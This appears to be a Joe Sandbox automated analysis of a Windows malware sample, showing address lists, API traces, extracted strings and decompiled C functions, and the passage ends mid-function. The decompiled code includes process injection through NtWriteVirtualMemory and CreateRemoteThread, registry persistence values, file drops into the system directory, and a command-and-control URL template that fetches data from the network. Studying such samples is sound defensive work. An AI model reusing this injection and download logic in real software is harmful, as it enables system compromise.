0x00402a98
0x00402a9a
0x00000000
0x00402aa0
0x00402aa0
0x00402aa7
0x00000000
0x00000000
0x00402ab6
0x00402ab8
0x00000000
0x00000000
0x00402ac0
0x00402acc
0x00402ad4
0x00402ad9
0x00402adf
0x00402ae2
0x00402ae4
0x00402aeb
0x00402aed
0x00402aed
0x00402aeb
0x00402af7
0x00402afc
0x00402b02
0x00402b04
0x00402b17
0x00402b17
0x00402b32
0x00402b37
0x00402b3e
0x00402b41
0x00402b6a
0x00402b70
0x00402b72
0x00000000
0x00000000
0x00402b78
0x00402b7b
0x00402b7d
0x00402b80
0x00402b82
0x00402b82
0x00402b82
0x00402b85
0x00402b85
0x00402b87
0x00402b89
0x00000000
0x00000000
0x00402b8b
0x00402b8e
0x00402b94
0x00402b98
0x00402b9a
0x00000000
0x00000000
0x00402ba0
0x00402ba3
0x00402ba5
0x00402ba8
0x00402bab
0x00402bab
0x00402bbb
0x00402bc0
0x00402bc3
0x00402bc5
0x00402bcb
0x00402bd5
0x00402be1
0x00402be8
0x00402bed
0x00402bef
0x00402bf1
0x00402bf3
0x00402bf3
0x00402bf3
0x00402bf6
0x00402bfb
0x00402bfd
0x00402c03
0x00402c06
0x00402c13
0x00402c18
0x00402c1a
0x00402c40
0x00402c45
0x00402c47
0x00402c65
0x00402c6f
0x00402c7a
0x00402c7a
0x00402c47
0x00402c1a
0x00000000
0x00402b43
0x00402b43
0x00402b53
0x00402b56
0x00402c84
0x00402c8e
0x00402c94
0x00402c96
0x00402ca9
0x00402ca9
0x00402cc4
0x00402cce
0x0040279e
0x0040279e
0x004027a5
0x004027e8
0x004027ef
0x004027ef
0x004027f2
0x004027a7
0x004027a9
0x004027b0
0x004027bc
0x004027ca
0x004027d3
0x004027d6
0x004027e0
0x004027e0
0x004027fd
0x0040281b
0x00402820
0x00402821
0x00402829
0x0040282c
0x00402832
0x00402841
0x0040284a
0x0040284d
0x00402850
0x00402855
0x0040285f
0x00402865
0x0040286a
0x00402870
0x00402873
0x00402877
0x00402881
0x00402883
0x00402883
0x00000000
0x00402881
0x00402b5c
0x00402b5f
0x00402cd8
0x00402cdf
0x00402ce5
0x00402ceb
0x00402d00
0x00402d06
0x00402d0b
0x00402d10
0x00402d12
0x00402d14
0x00402d4e
0x00402d4e
0x00000000
0x00402d4e
0x00402d1b
0x00402d25
0x00402d2b
0x00402d86
0x00402d9b
0x00402da1
0x00402da3
0x00000000
0x00000000
0x00402d37
0x00402d3a
0x00402d5d
0x00402d63
0x00402d65
0x00402d6b
0x00402d73
0x00402d73
0x00402d80
0x00402d80
0x00000000
0x00402d6b
0x00402d3e
0x00402d43
0x00402d49
0x00000000
0x00402d49
0x00402da7
0x00402db3
0x00402db5
0x00402dbd
0x00402dc5
0x00402dc5
0x00402dd7
0x00402de7
0x00402dec
0x00402df2
0x00402df8
0x00402e07
0x00402e1b
0x00402e27
0x00402e2c
0x00402e32
0x00402e35
0x00000000
0x00000000
0x00402e49
0x00402e55
0x00402e60
0x00402e63
0x00000000
0x00000000
0x00402e6e
0x00402e73
0x00402e79
0x00402e7f
0x00402e86
0x00402e86
0x00402e89
0x00402e8f
0x00402e95
0x00402ea1
0x00402ea6
0x00402eac
0x00402eaf
0x00000000
0x00000000
0x00402eb7
0x00402ec2
0x00402ec8
0x00402ecf
0x00402ed2
0x00402ed4
0x00402ed7
0x00402edc
0x00402ede
0x00402ee0
0x00402efe
0x00402f12
0x00402f1a
0x00402f20
0x00402f20
0x00402f25
0x00402f25
0x00402f27
0x00402f44
0x00402f44
0x00402f44
0x00402f47
0x00402f48
0x00402f48
0x00402f4c
0x00402f5e
0x00402f60
0x00402f63
0x00402f65
0x00402f6e
0x00000000
0x00402f6e
0x00402f29
0x00402f2b
0x00402f2b
0x00402f2b
0x00402f2c
0x00000000
0x00000000
0x00402f2e
0x00402f31
0x00402f32
0x00402f34
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f39
0x00402f3b
0x00000000
0x00000000
0x00000000
0x00402f3b
0x00402f3d
0x00402f3f
0x00402f41
0x00402f41
0x00000000
0x00402f3f
0x00402ee2
0x00402ee2
0x00402ee3
0x00402ee3
0x00402ee9
0x00402eea
0x00402eee
0x00402ef0
0x00402ef3
0x00402ef8
0x00402efa
0x00402efa
0x00000000
0x00402f71
0x00402f71
0x00402f77
0x00402f7d
0x00402f7d
0x00402f8c
0x00402fa3
0x00402fae
0x00402fbe
0x00402fd1
0x00402fd7
0x00402fe3
0x00402fe8
0x00402fea
0x00000000
0x00000000
0x00402ff0
0x00402ff3
0x00000000
0x00000000
0x00402ff9
0x00402ffc
0x00402ffe
0x00403000
0x00403002
0x00403005
0x0040300a
0x0040300a
0x00403011
0x00000000
0x00402dfa
0x00402dfa
0x00402e01
0x00000000
0x00000000
0x00000000
0x00402e01
0x00402df8
0x00402ced
0x00402cf3
0x00402cf3
0x00402cf9
0x00402cfa
0x00402cfa
0x00000000
0x00402cf3
0x00000000
0x00402b65
0x00402b45
0x00402b48
0x00000000
0x00000000
0x00000000
0x00402b4e
0x00402b41
0x00000000
0x00000000
0x00000000
0x004029e4
0x004029e4
0x004029e4
0x004029e7
0x004029e8
0x004029ef
0x004029f2
0x004029fd
0x00402a00
0x00402a01
0x00402a07
0x00402a07
0x00000000
0x004029e4
0x004030c3
0x004030c3
0x004030c7
0x004030d4
0x004030d4
0x00402791

APIs

RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000), ref: 0040268E
RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778), ref: 004026C4
RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000002), ref: 004026F3
RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000002), ref: 0040271B
GetSystemTimeAsFileTime.KERNEL32(00412190,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000), ref: 00402733
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000), ref: 00402766
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000), ref: 00402781
GetIpAddrTable.IPHLPAPI(?,00000012,00000000), ref: 004027E0
wsprintfA.USER32 ref: 0040281B
lstrlen.KERNEL32(?,?,%u.%u.%u.%s,00412104,00000000,000F003F,00408778,?,00000000), ref: 00402821

Part of subcall function 004010B2: wsprintfA.USER32 ref: 004010C5

lstrcpy.KERNEL32(?,?), ref: 00402954
wsprintfA.USER32 ref: 004029C1
wsprintfA.USER32 ref: 004029F2
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00408778,?,00000000), ref: 00402A31
InternetReadFile.WININET(?,?,00000100,00000000), ref: 00402A51
GetSystemTimeAsFileTime.KERNEL32(00412190,?,?,?,?,?,?,?,?,?,?,?,00408778,?,00000000), ref: 00402AF7
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402B17
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402B32
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00408778,?,00000000), ref: 00403022

Part of subcall function 00401625: select.WS2_32(00000000,?,00000000,00000000,?), ref: 004016A3
Part of subcall function 00401625: recv.WS2_32(00000000,?,?,00000002), ref: 004016B3
Part of subcall function 00401625: recv.WS2_32(00000000,?,00000001,00000000), ref: 004016D2

RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,Default Flags,00000000,00000003,00412190,00000012,00412190), ref: 00402C40
RegSetValueExA.ADVAPI32(?,g00d d0gg,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000,?), ref: 00402C6F
RegCloseKey.ADVAPI32(?,?,g00d d0gg,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C7A
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402CA9
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402CC4
Sleep.KERNEL32(00001388,?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?), ref: 00402CCE
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,?,?,?), ref: 004030A3
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,?,?,?), ref: 004030BE
Sleep.KERNEL32(-000927C0,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000), ref: 004030D4

Part of subcall function 0040211B: lstrcpy.KERNEL32(?,?), ref: 00402158
Part of subcall function 0040211B: GetTempPathA.KERNEL32(00000104,?,?,?,?,00000000,?,00000000,?,00402C02,00000000,00000000,?,Default Flags,00000000,00000003), ref: 004021E0
Part of subcall function 0040211B: lstrcpy.KERNEL32(?,?), ref: 00402204
Part of subcall function 0040211B: lstrcat.KERNEL32(00000000,?), ref: 0040220A
Part of subcall function 0040211B: lstrcat.KERNEL32(00000000,00000000), ref: 00402210
Part of subcall function 0040211B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040223F

Strings

, xrefs: 00402CD8
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00402C36
, xrefs: 00402AA0
Default Flags, xrefs: 004026ED, 00402710, 00402760, 00402776, 00402B11, 00402B27, 00402CA3, 00402CB9, 0040309D, 004030B3
g00d d0gg, xrefs: 00402C5A
%u.%u.%u.%s, xrefs: 00402815
%02X, xrefs: 004029E9
http://%s.biz/d/N?, xrefs: 004029B5
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy, xrefs: 00402684, 004026BA

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: Value$Time$File$Createwsprintf$Systemlstrcpy$QuerySleeplstrcatrecv$AddrCloseExitInternetPathProcessReadTableTemplstrlenselect
String ID: $ $%02X$%u.%u.%u.%s$Default Flags$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$g00d d0gg$http://%s.biz/d/N?
API String ID: 1970665916-436875747
Opcode ID: 0a94fe8c8a9239de4b7beebdc305c9b2d273767f90513b967f6ecd12a3c5538b
Instruction ID: 63bb0bbfe7c7d9cc37ae593e8b74d1bfbeffdf0d9e5c753dd1b0217088644f60
Opcode Fuzzy Hash: 0a94fe8c8a9239de4b7beebdc305c9b2d273767f90513b967f6ecd12a3c5538b
Instruction Fuzzy Hash: 9252B330A443159ADB30DB25CD8AB9A77B4AB04704F2081FAE549FB2D1D7B99E84CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040318D Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177
stringprocessmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E0040318D(char _a4) {
				signed int _v0;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v324;
				intOrPtr _v352;
				void* _v356;
				void* _v360;
				struct _SECURITY_ATTRIBUTES* _v364;
				intOrPtr _v368;
				void* _v376;
				void* _v380;
				signed int* _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				void* _v404;
				intOrPtr _v412;
				void* _v420;
				void* _t50;
				signed int _t52;
				int _t54;
				signed int _t56;
				signed int _t59;
				signed int _t62;
				void* _t64;
				_Unknown_base(*)()** _t65;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				void* _t69;
				signed int _t73;
				signed int _t74;
				_Unknown_base(*)()** _t75;
				signed int _t78;
				long _t79;
				void* _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				void* _t89;
				long* _t90;
				signed int _t91;
				long _t92;
				void* _t93;
				void* _t94;
				void* _t96;

				_t94 =  &_v356;
				_v364 = 0;
				_t50 = CreateToolhelp32Snapshot(2, 0);
				_v376 = _t50;
				if(_t50 == 0) {
					L37:
					return _v368;
				} else {
					_t52 =  *0x412040; // 0x0
					_t82 = 0;
					_t96 = _v368 - _t52;
					goto L2;
					while(1) {
						L5:
						__eflags = _t54;
						if(_t54 == 0) {
							break;
						}
						_t86 =  *0x412040; // 0x0
						_t84 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t84 - _t86;
							if(_t84 >= _t86) {
								break;
							}
							__eflags =  *((intOrPtr*)(0x412310 + _t84 * 4)) - _v352;
							if( *((intOrPtr*)(0x412310 + _t84 * 4)) != _v352) {
								_t84 = _t84 + 1;
								continue;
							}
							 *((char*)(_t94 + _t84 + 0x144)) = 1;
							L27:
							_t54 = Process32Next(_v380,  &_v360);
							goto L5;
						}
						_v376 =  &_a4;
						_t59 = _v0;
						while(1) {
							__eflags = _t59;
							if(_t59 == 0) {
								goto L27;
							}
							_push(_t59);
							_t62 = E004010DC( &_v324);
							_push(_t62);
							L00405E50();
							__eflags = _t62;
							if(_t62 != 0) {
								L26:
								_v384 =  &(_v384[1]);
								_t59 =  *_v384;
								continue;
							}
							_t79 = _v360;
							_push(_v12);
							L00405E40();
							__eflags =  *0x412100 - 2;
							_t19 = _t62 + 1; // 0x1
							_t92 = _t19;
							if( *0x412100 != 2) {
								_t64 = VirtualAlloc(0, _t92, 0x8001000, 4);
								_v380 = _t64;
								L00405E20();
								_t65 =  *0x405ef2; // 0x413254
								_t66 =  *0x412270(_t79 ^  *0x412280, 0xfffff000,  *_t65, _v388, 8, _t64, _v16);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L26;
								}
								L25:
								_t67 =  *0x412040; // 0x0
								 *((char*)(_t94 + _t67 + 0x144)) = 1;
								_v412 = _v412 + 1;
								 *((intOrPtr*)(0x412310 + _t67 * 4)) = _v392;
								_t68 = _t67 + 1;
								__eflags = _t68;
								 *0x412040 = _t68;
								goto L26;
							}
							_t69 = OpenProcess(0x2a, 0, _t79);
							__eflags = _t69;
							_t81 = _t69;
							if(_t69 == 0) {
								goto L26;
							}
							_v380 = 0;
							_t88 =  *0x412220;
							_t93 = 0;
							_v376 = _t92;
							__eflags = _t88;
							if(_t88 != 0) {
								__eflags =  *0x412230;
								if( *0x412230 != 0) {
									__eflags =  *0x412260;
									if( *0x412260 != 0) {
										_t90 =  &_v376;
										_t73 =  *_t88(_t81,  &_v380, 0, _t90, 0x1000, 4);
										__eflags = _t73;
										if(_t73 >= 0) {
											_t74 = NtWriteVirtualMemory(_t81, _v404, _v40, _t92, _t90);
											__eflags = _t74;
											if(_t74 >= 0) {
												_t75 =  *0x405ef2; // 0x413254
												_t93 = CreateRemoteThread(_t81, 0, 0x1000,  *_t75, _v420, 0, 0);
											}
										}
									}
								}
							}
							CloseHandle(_t81);
							__eflags = _t93;
							if(_t93 == 0) {
								goto L26;
							} else {
								CloseHandle(_t93);
								goto L25;
							}
						}
						goto L27;
					}
					_t89 = 0;
					CloseHandle(_v380);
					_t56 =  *0x412040; // 0x0
					_t83 = 0;
					__eflags = 0 - _t56;
					if(0 >= _t56) {
						goto L37;
					}
					_t78 = _t56;
					do {
						__eflags =  *((char*)(_t94 + _t89 + 0x144));
						if( *((char*)(_t94 + _t89 + 0x144)) != 0) {
							_t83 = _t83 + 1;
							__eflags = _t83;
							goto L35;
						}
						_t44 = _t56 - 1; // -1
						_t91 = _t44;
						_t85 = _t83;
						_t78 = _t91;
						__eflags = _t83 - _t91;
						while(__eflags < 0) {
							 *((intOrPtr*)(0x412310 + _t85 * 4)) =  *((intOrPtr*)(0x412314 + _t85 * 4));
							_t85 = _t85 + 1;
							__eflags = _t85 - _t91;
						}
						L35:
						_t89 = _t89 + 1;
						__eflags = _t83 - _t78;
						_t56 = _t78;
					} while (_t83 < _t78);
					 *0x412040 = _t78;
					goto L37;
					L2:
					if(_t96 >= 0) {
						_v356 = 0x128;
						_t54 = Process32First(_v376,  &_v356);
						goto L5;
					} else {
						 *((char*)(_t94 + _t82 + 0x144)) = 0;
						_t82 = _t82 + 1;
						_t96 = _t82 - _t52;
						goto L2;
					}
				}
			}

0x00403191
0x00403197
0x004031a3
0x004031a8
0x004031ad
0x004033dc
0x004033ea
0x004031b3
0x004031b3
0x004031b8
0x004031ba
0x004031ba
0x004031e3
0x004031e3
0x004031e3
0x004031e5
0x00000000
0x00000000
0x004031eb
0x004031f1
0x004031f1
0x004031f3
0x004031f3
0x004031f5
0x00000000
0x00000000
0x004031fb
0x00403202
0x00403211
0x00000000
0x00403211
0x00403204
0x0040337c
0x00403385
0x00000000
0x00403385
0x0040321b
0x0040321f
0x00403226
0x00403226
0x00403228
0x00000000
0x00000000
0x0040322e
0x00403233
0x00403238
0x00403239
0x0040323e
0x00403240
0x0040336c
0x00403370
0x00403375
0x00000000
0x00403375
0x00403246
0x0040324a
0x00403251
0x00403256
0x0040325d
0x0040325d
0x00403260
0x00403318
0x0040331d
0x00403322
0x00403329
0x00403340
0x00403346
0x00403348
0x00000000
0x00000000
0x0040334a
0x0040334a
0x00403353
0x0040335b
0x0040335f
0x00403366
0x00403366
0x00403367
0x00000000
0x00403367
0x0040326b
0x00403270
0x00403272
0x00403274
0x00000000
0x00000000
0x0040327a
0x00403282
0x00403288
0x0040328a
0x0040328e
0x00403290
0x00403292
0x00403299
0x0040329b
0x004032a2
0x004032ab
0x004032b8
0x004032ba
0x004032bc
0x004032cc
0x004032d2
0x004032d4
0x004032d8
0x004032f3
0x004032f3
0x004032d4
0x004032bc
0x004032a2
0x00403299
0x004032f6
0x004032fb
0x004032fd
0x00000000
0x004032ff
0x00403300
0x00000000
0x00403300
0x004032fd
0x00000000
0x00403226
0x00403392
0x00403394
0x00403399
0x0040339e
0x004033a0
0x004033a2
0x00000000
0x00000000
0x004033a4
0x004033a6
0x004033a6
0x004033ae
0x004033ce
0x004033ce
0x00000000
0x004033ce
0x004033b0
0x004033b0
0x004033b3
0x004033b5
0x004033b7
0x004033b9
0x004033c2
0x004033c9
0x004033ca
0x004033ca
0x004033cf
0x004033cf
0x004033d0
0x004033d2
0x004033d2
0x004033d6
0x00000000
0x004031be
0x004031be
0x004031cd
0x004031de
0x00000000
0x004031c0
0x004031c0
0x004031c8
0x004031c9
0x00000000
0x004031c9
0x004031be

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004031A3
Process32First.KERNEL32(?,00000128), ref: 004031DE
lstrcmpi.KERNEL32 ref: 00403239
lstrlen.KERNEL32(?,00000000,?,00000000,?), ref: 00403251
OpenProcess.KERNEL32(0000002A,00000000,?,?,00000000,?,00000000,?), ref: 0040326B
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000001,?), ref: 004032CC
CreateRemoteThread.KERNEL32(00000000,00000000,00001000,00413254,00000128,00000000,00000000), ref: 004032ED
CloseHandle.KERNEL32(00000000,0000002A,00000000,?,?,00000000,?,00000000,?), ref: 004032F6
CloseHandle.KERNEL32(00000000,00000000,0000002A,00000000,?,?,00000000,?,00000000,?), ref: 00403300
VirtualAlloc.KERNEL32(00000000,00000001,08001000,00000004,?,?,00000000,?,00000000,?), ref: 00403318
lstrcpy.KERNEL32(00000000,00000000), ref: 00403322
Process32Next.KERNEL32 ref: 00403385
CloseHandle.KERNEL32 ref: 00403394

Strings

T2A, xrefs: 004032D8, 00403329

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32Virtual$AllocFirstMemoryNextOpenProcessRemoteSnapshotThreadToolhelp32Writelstrcmpilstrcpylstrlen
String ID: T2A
API String ID: 3585601317-2019523081
Opcode ID: 9fc3e1f609d0bb6cc48c961a07cdf8a14b030922415b4cdca5203e943365ea5e
Instruction ID: 0d498c4b157c114e0e64cb6a536b5d7ba074e5f61d63f8cd94b78a514f351688
Opcode Fuzzy Hash: 9fc3e1f609d0bb6cc48c961a07cdf8a14b030922415b4cdca5203e943365ea5e
Instruction Fuzzy Hash: AE518130204301AFD710DF25DD49BAB7AE9FB88705F10843EF685E6191DBB8D915CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004091DE Relevance: 1.6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

Strings

@, xrefs: 004093D9

Memory Dump Source

Source File: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4c8f717c826cf16ac6de480a318cd90fd350a735f292e869bf269883833a7d67
Instruction ID: 2a3d4f3759edfc8bd902bad60b75e0620addfa70aed4b2345ac6c2a4edc195e5
Opcode Fuzzy Hash: 4c8f717c826cf16ac6de480a318cd90fd350a735f292e869bf269883833a7d67
Instruction Fuzzy Hash: A5D105711083429FE714CF28C88176BBBE1AB84354F04862BFAD9A62D2D37DDD45DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA4B Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d4fadce87f9a62de8e3424b062dbd550e6430686c3f1a88798db9ac4a8dbda0
Instruction ID: fe1b87df574376db241973c0d4ca01d053bad7c73b67e64caab8c7a3df23b40a
Opcode Fuzzy Hash: 5d4fadce87f9a62de8e3424b062dbd550e6430686c3f1a88798db9ac4a8dbda0
Instruction Fuzzy Hash: F912F730508281EAF711D7288C80B6F3A90EB16395F604977E5C6FB2DACF7D9841879E

Uniqueness

Uniqueness Score: -1.00%

Function 00404DB4 Relevance: 63.2, APIs: 30, Strings: 6, Instructions: 228
registryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404DB4(char _a3, int _a4, int _a8, void* _a12, char _a20, struct _SECURITY_ATTRIBUTES* _a24, char _a30, char _a31, int _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, int _a44, struct _SECURITY_ATTRIBUTES* _a48, struct _SECURITY_ATTRIBUTES* _a52, void* _a56, int _a64, int _a68, struct _FILETIME _a92, void* _a96, struct _FILETIME _a100, void* _a104, struct _FILETIME _a108, void* _a112, long _a116, void* _a120, long _a124, void* _a128, int _a136, int _a144, long _a156, void* _a160, char _a1417, char _a1450, char _a1920, signed char _a1976, char _a1977, char _a2530, char _a3284, char _a3296, char _a3304, char _a3312, char _a3552, char _a3576, char _a3584, char _a3592, char _a3608, char _a3828, char _a4100, char _a4612, char _a5424, char _a5428, char _a5432) {
				intOrPtr _v0;
				struct _SECURITY_ATTRIBUTES* _v4;
				int _v8;
				int _v12;
				int _v20;
				CHAR* _t175;
				int _t177;
				long _t178;
				CHAR* _t179;
				int _t181;
				long _t182;
				CHAR* _t187;
				void* _t189;
				CHAR* _t190;
				void* _t192;
				char* _t202;
				int _t203;
				signed char* _t208;
				int _t211;
				int _t212;
				int _t218;
				int _t219;
				int _t224;
				int _t229;
				int _t231;
				void* _t233;
				int _t237;
				void* _t239;
				int _t244;
				long _t248;
				int _t249;
				int _t255;
				int _t257;
				int _t260;
				int _t267;
				int _t269;
				int _t271;
				int _t276;
				int _t279;
				int _t281;
				int _t284;
				int _t286;
				char _t290;
				int _t295;
				int _t297;
				int _t299;
				struct _SECURITY_ATTRIBUTES* _t303;
				void* _t304;
				void* _t306;
				char* _t307;
				char* _t308;
				int _t309;
				char* _t310;
				char* _t311;
				char* _t312;
				char* _t313;
				char* _t314;
				int _t315;
				char* _t316;
				int _t317;
				char* _t319;
				CHAR* _t320;
				int _t324;
				int _t326;
				int _t329;
				void* _t343;
				int _t344;
				long _t347;
				CHAR* _t353;
				int _t355;
				long _t356;
				int _t361;
				void* _t370;
				signed char _t378;
				CHAR* _t379;
				CHAR* _t380;
				CHAR* _t381;
				CHAR* _t382;
				CHAR* _t383;
				CHAR* _t384;
				char* _t385;
				void** _t386;
				char* _t387;
				char* _t388;
				CHAR* _t389;
				int _t392;
				char* _t393;
				char* _t395;
				char* _t396;
				char* _t397;
				char* _t398;
				char* _t402;
				void* _t403;
				signed int* _t427;
				char* _t428;
				int _t431;
				void** _t433;
				char* _t434;
				CHAR* _t435;
				signed char* _t436;
				long _t437;
				struct _FILETIME* _t438;
				long* _t439;

				if(GetTempPathA(0x104, ??) == 0) {
					L7:
					E00401029(_a20);
					_t380 =  &_a3608;
					_t175 = GetSystemDirectoryA(_t380, 0x104);
					_push(0x80);
					_push( *0x4120c0);
					_push(0x41103e);
					_push(_t380);
					L00405E30();
					L00405E30();
					SetFileAttributesA(_t175, _t175);
					_t177 = CreateFileA(_t380, 0x40000000, 0, 0, 2, 0x80, 0);
					_a144 = _t177;
					__eflags = _t177;
					if(_t177 == 0) {
						L14:
						_t178 = GetLastError();
